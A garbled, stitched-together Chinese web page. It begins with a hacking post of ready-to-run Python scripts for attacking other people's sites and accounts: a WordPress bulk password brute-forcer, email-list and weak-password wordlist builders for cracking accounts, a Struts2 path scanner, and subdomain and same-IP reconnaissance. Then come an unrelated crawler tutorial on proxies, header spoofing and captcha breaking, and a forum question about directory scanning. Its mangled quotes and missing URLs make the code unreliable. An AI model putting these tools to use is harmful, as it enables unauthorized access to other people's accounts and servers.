如何使用网上搜索到的python脚本实例

学习笔记下载地址:链接: /s/1c1XLRB6 密码: 2j3r解压密码:xindongT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security&&i5 F6 x& k7 A* X6 I&&@下载完之后打开Evernote_index.html文件 即可查看目录简利同IP站查询:[hide]#!/usr/bin/python# -*- coding:utf-8 -*-import urllibimport sysimport retry:& && &&&url = &http://s./same?s= && && &&&zhan = sys.argv[1]& && &&&f = open(zhan + &.txt&,&w&)& && &&&jieguo = urllib.urlopen(url + str(zhan))& && &&&content = jieguo.read()& && &&&ree = r&\&\/span\& \&a href=\'(.*?)\' target=_blank\&&& && && && && && &&&& && &&&ss = re.findall(ree,content)& && &&&for x in ss:& && && && && & print&&f,x& && &&&print 'ok,look ' + zhan + '.txt.'& && &&&f.close()except:& && &&&print 'eg:python pz.py '[/hide]备注:python pz.py&&&结果会输出到.txt文件中查询它的二级域名py脚本。#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: utf_8 -*-# Date: import sys, osimport urllib2try:& & from lxml import htmlexcept ImportError:& & raise SystemExit('\n[X] lxml模块导入错误,请执行pip install lxml安装!')class SubMain():& & '''& & 渗透测试域名收集& & '''& & def __init__(self, submain):& & & & self.submain = submain& & & & self.url_360 = '/sub/index/?url=%s' % self.submain& & & & self.url_link = '/subdomain/'& & & & self.link_post = 'domain=%s&b2=1&b3=1&b4=1' % self.submain& & & & self.sublist = []& & def get_360(self):& & & & scan_data = urllib2.urlopen(self.url_360).read()& & & & html_data = html.fromstring(scan_data)& & & & submains = html_data.xpath(&//dd/strong/text()&)& & & & return self.sublist.extend(submains)& & def get_links(self):& & & & link_data = urllib2.Request(self.url_link, data=self.link_post)& & & & link_res = urllib2.urlopen(link_data).read()& & & & html_data = html.fromstring(link_res)& & & & submains = html_data.xpath(&//div[@class='domain']/a/text()&)& & & & submains = [i.replace('http://', '') for i in submains]& & & & return self.sublist.extend(submains)& & def scan_domain(self):& & & & self.get_360()& & & & self.get_links()& & & & return list(set(self.sublist))if __name__ == '__main__':& & print '+' + '-' * 50 + '+'& & print '\t & &Python 二级域名信息收集工具'& & print '\t & Blog:/'& & print '\t\t Code BY: Mandy'& & print '\t\t Time:'& & print '+' + '-' * 50 + '+'& & if len(sys.argv) != 2:& & & & print '用法: ' + os.path.basename(sys.argv[0]) + ' 主域名地址'& & & & print '实例: ' + os.path.basename(sys.argv[0]) + ' '& & & & sys.exit()& & domain = sys.argv[1]& & print u'报告爷,正在收集域名信息,请稍候!\n'& & submain = SubMain(domain).scan_domain()& & print u'报告爷,共发现域名信息 [ %d ] 条!\n' % len(submain)& & with open(domain + '.txt', 'wb+') as domain_file:& & & & for item in submain:& & & & & & domain_file.write(item + '\n')& & & & & & print itemstruts2批量查询[hide]#!/usr/bin/python# -*- coding:utf-8 -*-import requestsa = open(&ip.txt&,&r&)b = (&/index.action&,&/index.do&,&/login.do&,&/login.action&)x = open(&success.txt&,&w&)for c in a:& && &&&d = c.strip()& && &&&for e in b:& && && && && & g = requests.get(str(d) + str(e))& && && && && & print g.url& && && && && & if g.status_code == 200:& && && && && && && && &print&&x,g.url& && &&&a.close()x.close()[/hide]备注:ip.txt放要扫描的url,一行一个如果不想导入,再放上一个直接测试的,当然,可能会有误报,因为只放了一个016的poc进去:[hide]a = open('mail.txt','w')x = open('xingming500.txt','r')for f in x:& && &&&f = f.strip()& && &&&print f + '@'& && &&&print&&a,f + '@'& && &&&& && &&&& && &&&liuguizhen@liuyu@liujianjun@zhangshuying@lihongxia@zhaoxiuying@libo@wangli@zhangrong@[/hide]备注:经常爆破邮箱,总不能收集到一个用户名,后面就加一个对方域名吧。使用方法:mail.txt是准备输出内容的文件,xingming500.txt是收集到的用户名,比如zhangsan,lisi弱密码fuzz[hide]import syskey = sys.argv[1]dic = open('dic.txt','r')suc = open('ok.txt','w')for a in dic:& & a = a.strip()& & a = a.replace(&%username%&,key)& & print a& & suc.write(a+'\n')dic.close()suc.close()使用方法python weakpwdfuzz.py chinabaiker-------ichunqiuichunqiu1ichunqiu12ichunqiu123ichunqiu1234--------dic.txt放模版字典,本目录有个规则,可以直接使用[/hide]wordpress批量爆破程序[hide]#!/usr/bin/python# -*- coding:utf-8 -*-import requestsimport cookielibimport urllib2import urllibbc = open('success.txt','w')ht = &/wp-login.php&headers = {&Content-type&:&application/x-www-form-urlencoded&,&User-Agent&:&Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/ Firefox/41.0&,& && && && && && & &Connection&: &keep-alive&}urls = open('url.txt','r')for x in urls:& && &&&x = x.strip()& && &&&print x,&==============&& && &&&qq = requests.get(str(x) + str(ht),timeout=15)& && &&&if qq.status_code == 200:& && && && && & print qq.url& && && && && & user = open('user.txt','r')& && && && && & for u in user:& && && && && && && && &u = u.strip()& && && && && && && && &print &username: &,u& && && && && && && && &pw = open('pass.txt','r')& && && && && && && && &for p in pw:& && && && && && && && && && &&&p = p.strip()& && && && && && && && && && &&&print &password: &,p& && && && && && && && && && &&&#设置一个cookie处理器,它负责从服务器下载cookie到本地,并且在发送请求时带上本地的cookie& && && && && && && && && && &&&cj = cookielib.LWPCookieJar()& && && && && && && && && && &&&cookie_support = urllib2.HTTPCookieProcessor(cj)& && && && && && && && && && &&&opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)& && && && && && && && && && &&&urllib2.install_opener(opener)& && && && && && && && && && &&&postData = {'log':u,'pwd':p}& && && && && && && && && && &&&#需要给Post数据编码& && && && && && && && && && &&&postData = urllib.urlencode(postData)& && && && && && && && && && &&&#通过urllib2提供的request方法来向指定Url发送我们构造的数据,并完成登录过程& && && && && && && && && && &&&request = urllib2.Request(qq.url, postData, headers)& && && && && && && && && && &&&response = urllib2.urlopen(request)& && && && && && && && && && &&&text = response.read()& && && && && && && && && && &&&#print text& && && && && && && && && && &&&if text.find('Dashboard')!=-1 or text.find('仪表盘')!=-1:& && && && && && && && && && && && && & print 'success',qq.url , 'username is: ' + u , 'password is : ' + p& && && && && && && && && && && && && & print&&bc,'success',qq.url , 'username is: ' + u , 'password is : ' + p[/hide]备注:url.txt放想要爆破的url,user.txt放用户名字典,pass.txt放密码字典,会把成功的输出到success.txt里。整理mail小程序[hide]import remail = open('mail2.txt','r')&&//mail2.txt为杂乱的,复制下来的邮箱记事本key = r'&(.*?)&'for m in mail:& && &&&m = m.strip()#& && &&&print m& && &&&q = re.findall(key,m)& && &&&for w in q:& && && && && & print w哪里用到,比如,我们用foxmail进入了某个邮箱,可是不是qq exmail,不能导出通讯录,咋办?只能一个一个手动的从发件箱,收件箱里把邮件一个一个的抄到记事本里,然后抄完,记事本里肯定是乱糟糟的,里面不仅有我们需要提炼出来的邮箱,格式为[email][/email],还有姓名,符号等杂七杂八的东西,那么,上面的程序可以帮助你。:)[/hide]子域名爆破:[hide]#!/usr/bin/python# -*- coding:utf-8 -*-import reimport sysimport requestsdata = &domain=& + sys.argv[1] + &&b2=1&b3=1&b4=1&test = open('test.txt','w')key = r&value=\&(.+?)\&&&input&headers = {&Content-type&:&application/x-www-form-urlencoded&,&Referer&:&/subdomain/&}go = requests.post(&/subdomain/&,data=data,headers=headers)response = re.findall(key,go.content)for r in response:& && &&&print r[/hide]网络安全技术(network-sec) 
 文章为作者独立观点,不代表微头条立场
的最新文章
这世界,美丽易碎,不必慌乱,只要静然于心,就会海阔天空; 这人生,痛并快乐,无须埋怨,只有心存感激,就会精彩0x00 前言如何导出域内所有用户hash,那么,接下来准备用破解出的用户名口令尝试远程登陆目标主机并执行程学习笔记下载地址:链接: /s/1c1XLRB6 密码: 2j3r解获取磁盘目录:1. method:%23_memberAccess%3d@ognl.OgnlContext@0x00 简介本文源于老外 @nvisium 在其博客发表的博文 《Injecting Flask》,在原文network-sec关注互联网、黑客技术、创业、文学。不定期分享关于国内外黑客技术、互联网安全事件。热门文章最新文章network-sec关注互联网、黑客技术、创业、文学。不定期分享关于国内外黑客技术、互联网安全事件。python爬虫抓网页的总结 - 为程序员服务
为程序员服务
python爬虫抓网页的总结
学用python也有3个多月了,用得最多的还是各类爬虫脚本:写过抓代理本机验证的脚本,写过在discuz论坛中自动登录自动发贴的脚本,写过自动收邮件的脚本,写过简单的验证码识别的脚本,本来想写的抓取脚本的,结果有了强大的gmbox,也就不用写了。
这些脚本有一个共性,都是和web相关的,总要用到获取链接的一些方法,再加上simplecd这个半爬虫半网站的项目,累积不少爬虫抓站的经验,在此总结一下,那么以后做东西也就不用重复劳动了。
1.最基本的抓站
import urllib2
content = urllib2.urlopen('http://XXXX').read()
2.使用代理服务器
这在某些情况下比较有用,比如IP被封了,或者比如IP访问的次数受到限制等等。
import urllib2
proxy_support = urllib2.ProxyHandler({'http':'http://XX.XX.XX.XX:XXXX'})
opener = urllib2.build_opener(proxy_support, urllib2.HTTPHandler)
urllib2.install_opener(opener)
content = urllib2.urlopen('http://XXXX').read()
3.需要登录的情况
登录的情况比较麻烦我把问题拆分一下:
3.1 cookie的处理
import urllib2, cookielib
cookie_support= urllib2.HTTPCookieProcessor(cookielib.CookieJar())
opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
urllib2.install_opener(opener)
content = urllib2.urlopen('http://XXXX').read()
是的没错,如果想同时用代理和cookie,那就加入proxy_support然后operner改为
opener = urllib2.build_opener(proxy_support, cookie_support, urllib2.HTTPHandler)
3.2 表单的处理
登录必要填表,表单怎么填?首先利用工具截取所要填表的内容。
比如我一般用firefox+httpfox插件来看看自己到底发送了些什么包
这个我就举个例子好了,以verycd为例,先找到自己发的POST请求,以及POST表单项:
可以看到verycd的话需要填username,password,continueURI,fk,login_submit这几项,其中fk是随机生成的(其实不太随机,看上去像是把epoch时间经过简单的编码生成的),需要从网页获取,也就是说得先访问一次网页,用正则表达式等工具截取返回数据中的fk项。continueURI顾名思义可以随便写,login_submit是固定的,这从源码可以看出。还有username,password那就很显然了。
好的,有了要填写的数据,我们就要生成postdata
import urllib
postdata=urllib.urlencode({
'username':'XXXXX',
'password':'XXXXX',
'continueURI':'/',
'login_submit':'登录'
然后生成http请求,再发送请求:
req = urllib2.Request(
url = '/signin/*//',
data = postdata
result = urllib2.urlopen(req).read()
3.3 伪装成浏览器访问
某些网站反感爬虫的到访,于是对爬虫一律拒绝请求。这时候我们需要伪装成浏览器,这可以通过修改http包中的header来实现:
headers = {
'User-Agent':'Mozilla/5.0 (W U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/ Firefox/3.5.6'
req = urllib2.Request(
url = '/signin/*//',
data = postdata,
headers = headers
3.4 反”反盗链”
某些站点有所谓的反盗链设置,其实说穿了很简单,就是检查你发送请求的header里面,referer站点是不是他自己,所以我们只需要像3.3一样,把headers的referer改成该网站即可,以黑幕著称地cnbeta为例:
headers = {
'Referer':'/articles'
headers是一个dict数据结构,你可以放入任何想要的header,来做一些伪装。例如,有些自作聪明的网站总喜欢窥人隐私,别人通过代理访问,他偏偏要读取header中的X-Forwarded-For来看看人家的真实IP,没话说,那就直接把X-Forwarde-For改了吧,可以改成随便什么好玩的东东来欺负欺负他,呵呵。
3.5 终极绝招
有时候即使做了3.1-3.4,访问还是会被据,那么没办法,老老实实把httpfox中看到的headers全都写上,那一般也就行了。 再不行,那就只能用终极绝招了,selenium直接控制浏览器来进行访问,只要浏览器可以做到的,那么它也可以做到。类似的还有pamie,watir,等等等等。
4.多线程并发抓取
单线程太慢的话,就需要多线程了,这里给个简单的线程池模板 这个程序只是简单地打印了1-10,但是可以看出是并发地。
from threading import Thread
from Queue import Queue
from time import sleep
#q是任务队列
#NUM是并发线程总数
#JOBS是有多少任务
q = Queue()
#具体的处理函数,负责处理单个任务
def do_somthing_using(arguments):
print arguments
#这个是工作进程,负责不断从队列取数据并处理
def working():
while True:
arguments = q.get()
do_somthing_using(arguments)
q.task_done()
#fork NUM个线程等待队列
for i in range(NUM):
t = Thread(target=working)
t.setDaemon(True)
#把JOBS排入队列
for i in range(JOBS):
#等待所有JOBS完成
5.验证码的处理
碰到验证码咋办?这里分两种情况处理:
google那种验证码,肉眼看吧
简单的验证码:字符个数有限,只使用了简单的平移或旋转加噪音而没有扭曲的,这种还是有可能可以处理的,一般思路是旋转的转回来,噪音去掉,然后划分单个字符,划分好了以后再通过特征提取的方法(例如PCA)降维并生成特征库,然后把验证码和特征库进行比较。这个比较复杂,一篇博文是说不完的,这里就不展开了,具体做法请弄本相关教科书好好研究一下。
事实上有些验证码还是很弱的,这里就不点名了,反正我通过2的方法提取过准确度非常高的验证码,所以2事实上是可行的。
6 gzip/deflate支持
现在的网页普遍支持gzip压缩,这往往可以解决大量传输时间,以VeryCD的主页为例,未压缩版本247K,压缩了以后45K,为原来的1/5。这就意味着抓取速度会快5倍。
然而python的urllib/urllib2默认都不支持压缩,要返回压缩格式,必须在request的header里面写明’accept-encoding’,然后读取response后更要检查header查看是否有’content-encoding’一项来判断是否需要解码,很繁琐琐碎。如何让urllib2自动支持gzip, defalte呢?
其实可以继承BaseHanlder类,然后build_opener的方式来处理:
import urllib2
from gzip import GzipFile
from StringIO import StringIO
class ContentEncodingProcessor(urllib2.BaseHandler):
&&&A handler to add gzip capabilities to urllib2 requests &&&
# add headers to requests
def http_request(self, req):
req.add_header(&Accept-Encoding&, &gzip, deflate&)
return req
def http_response(self, req, resp):
old_resp = resp
if resp.headers.get(&content-encoding&) == &gzip&:
gz = GzipFile(
fileobj=StringIO(resp.read()),
resp = urllib2.addinfourl(gz, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
if resp.headers.get(&content-encoding&) == &deflate&:
gz = StringIO( deflate(resp.read()) )
resp = urllib2.addinfourl(gz, old_resp.headers, old_resp.url, old_resp.code)
# 'class to add info() and
resp.msg = old_resp.msg
return resp
# deflate support
import zlib
def deflate(data):
# zlib only provides the zlib compress format, no
# so on top of all there's this workaround:
return zlib.decompress(data, -zlib.MAX_WBITS)
except zlib.error:
return zlib.decompress(data)
然后就简单了,
encoding_support = ContentEncodingProcessor
opener = urllib2.build_opener( encoding_support, urllib2.HTTPHandler )
#直接用opener打开网页,如果服务器支持gzip/defalte则自动解压缩
content = opener.open(url).read()
更方便地多线程
总结一文的确提及了一个简单的多线程模板,但是那个东东真正应用到程序里面去只会让程序变得支离破碎,不堪入目。在怎么更方便地进行多线程方面我也动了一番脑筋。先想想怎么进行多线程调用最方便呢?
1、用twisted进行异步I/O抓取
事实上更高效的抓取并非一定要用多线程,也可以使用异步I/O法:直接用twisted的getPage方法,然后分别加上异步I/O结束时的callback和errback方法即可。例如可以这么干:
from twisted.web.client import getPage
from twisted.internet import reactor
links = [ '/topics/%d/'%i for i in range() ]
def parse_page(data,url):
print len(data),url
def fetch_error(error,url):
print error.getErrorMessage(),url
# 批量抓取链接
for url in links:
getPage(url,timeout=5) \
.addCallback(parse_page,url) \ #成功则调用parse_page方法
.addErrback(fetch_error,url)
#失败则调用fetch_error方法
reactor.callLater(5, reactor.stop) #5秒钟后通知reactor结束程序
reactor.run()
twisted人如其名,写的代码实在是太扭曲了,非正常人所能接受,虽然这个简单的例子看上去还好;每次写twisted的程序整个人都扭曲了,累得不得了,文档等于没有,必须得看源码才知道怎么整,唉不提了。
如果要支持gzip/deflate,甚至做一些登陆的扩展,就得为twisted写个新的HTTPClientFactory类诸如此类,我这眉头真是大皱,遂放弃。有毅力者请自行尝试。
这篇讲怎么用twisted来进行批量网址处理的文章不错,由浅入深,深入浅出,可以一看。
2、设计一个简单的多线程抓取类
还是觉得在urllib之类python“本土”的东东里面折腾起来更舒服。试想一下,如果有个Fetcher类,你可以这么调用
f = Fetcher(threads=10) #设定下载线程数为10
for url in urls:
f.push(url)
#把所有url推入下载队列
while f.taskleft(): #若还有未完成下载的线程
content = f.pop()
#从下载完成队列中取出结果
do_with(content) # 处理content内容
这么个多线程调用简单明了,那么就这么设计吧,首先要有两个队列,用Queue搞定,多线程的基本架构也和“技巧总结”一文类似,push方法和pop方法都比较好处理,都是直接用Queue的方法,taskleft则是如果有“正在运行的任务”或者”队列中的任务”则为是,也好办,于是代码如下:
import urllib2
from threading import Thread,Lock
from Queue import Queue
import time
class Fetcher:
def __init__(self,threads):
self.opener = urllib2.build_opener(urllib2.HTTPHandler)
self.lock = Lock() #线程锁
self.q_req = Queue() #任务队列
self.q_ans = Queue() #完成队列
self.threads = threads
for i in range(threads):
t = Thread(target=self.threadget)
t.setDaemon(True)
self.running = 0
def __del__(self): #解构时需等待两个队列完成
time.sleep(0.5)
self.q_req.join()
self.q_ans.join()
def taskleft(self):
return self.q_req.qsize()+self.q_ans.qsize()+self.running
def push(self,req):
self.q_req.put(req)
def pop(self):
return self.q_ans.get()
def threadget(self):
while True:
req = self.q_req.get()
with self.lock: #要保证该操作的原子性,进入critical area
self.running += 1
ans = self.opener.open(req).read()
except Exception, what:
print what
self.q_ans.put((req,ans))
with self.lock:
self.running -= 1
self.q_req.task_done()
time.sleep(0.1) # don't spam
if __name__ == &__main__&:
links = [ '/topics/%d/'%i for i in range() ]
f = Fetcher(threads=10)
for url in links:
f.push(url)
while f.taskleft():
url,content = f.pop()
print url,len(content)
一些琐碎的经验
1、连接池:
opener.open和urllib2.urlopen一样,都会新建一个http请求。通常情况下这不是什么问题,因为线性环境下,一秒钟可能也就新生成一个请求;然而在多线程环境下,每秒钟可以是几十上百个请求,这么干只要几分钟,正常的有理智的服务器一定会封禁你的。
然而在正常的html请求时,保持同时和服务器几十个连接又是很正常的一件事,所以完全可以手动维护一个HttpConnection的池,然后每次抓取时从连接池里面选连接进行连接即可。
这里有一个取巧的方法,就是利用squid做代理服务器来进行抓取,则squid会自动为你维护连接池,还附带数据缓存功能,而且squid本来就是我每个服务器上面必装的东东,何必再自找麻烦写连接池呢。
2、设定线程的栈大小
栈大小的设定将非常显著地影响python的内存占用,python多线程不设置这个值会导致程序占用大量内存,这对openvz的vps来说非常致命。stack_size必须大于32768,实际上应该总要32768*2以上
from threading import stack_size
stack_size(32768*16)
3、设置失败后自动重试
def get(self,req,retries=3):
response = self.opener.open(req)
data = response.read()
except Exception , what:
print what,req
if retries&0:
return self.get(req,retries-1)
print 'GET Failed',req
return data
4、设置超时
import socket
socket.setdefaulttimeout(10) #设置10秒后连接超时
登陆更加简化了,首先build_opener中要加入cookie支持,参考“总结”一文;如要登陆VeryCD,给Fetcher新增一个空方法login,并在init()中调用,然后继承Fetcher类并override login方法:
def login(self,username,password):
import urllib
data=urllib.urlencode({'username':username,
'password':password,
'continue':'/',
'login_submit':u'登录'.encode('utf-8'),
'save_cookie':1,})
url = '/signin'
self.opener.open(url,data).read()
于是在Fetcher初始化时便会自动登录VeryCD网站。
如此,把上述所有小技巧都糅合起来就和我目前的私藏最终版的Fetcher类相差不远了,它支持多线程,gzip/deflate压缩,超时设置,自动重试,设置栈大小,自动登录等功能;代码简单,使用方便,性能也不俗,可谓居家旅行,杀人放火,咳咳,之必备工具。
之所以说和最终版差得不远,是因为最终版还有一个保留功能“马甲术”:多代理自动选择。看起来好像仅仅是一个random.choice的区别,其实包含了代理获取,代理验证,代理测速等诸多环节,这就是另一个故事了。
您可能的代码
相关聚客文章
相关专栏文章各位python达人,怎样写一个爬取网站目录的脚本,如存在这个目录就返回成功. - 开源中国社区
当前访客身份:游客 [
当前位置:
1、程序自动获取 某个网站的一个目录。如:/editor/ --&爬行某个网站是否存在 /editor/这个目录。
& 1.py /editor/&&
2、批量获取,一次对多个网站进行爬行,如,把这些要爬取的网站URL写到一个 txt 文档里。
& 2.py url.txt
共有5个答案
<span class="a_vote_num" id="a_vote_num_
1.直接用urllib2里的api爬就可以了
2. parse这个txt文件,然后用urllib2
<span class="a_vote_num" id="a_vote_num_
如果只是想完成这个任务,wget!!!!
<span class="a_vote_num" id="a_vote_num_
目录是否存在判断 对网站本身来说 是不安全的。。 &&
如果网站有 “列目录” 之类的配置错误 就才能实现&
再说 现在网站 都是用mvc url路由 &目录本身也是一个 请求方法而已 只是虚构的目录
<span class="a_vote_num" id="a_vote_num_
完全可以做到的,现在正写呢。
<span class="a_vote_num" id="a_vote_num_
wget 不能实现。
目前用到的是 httplib和sys.
更多开发者职位上
有什么技术问题吗?
我是小学生的其它问题
类似的话题

我要回帖

更多关于 如何运行python脚本 的文章

 

随机推荐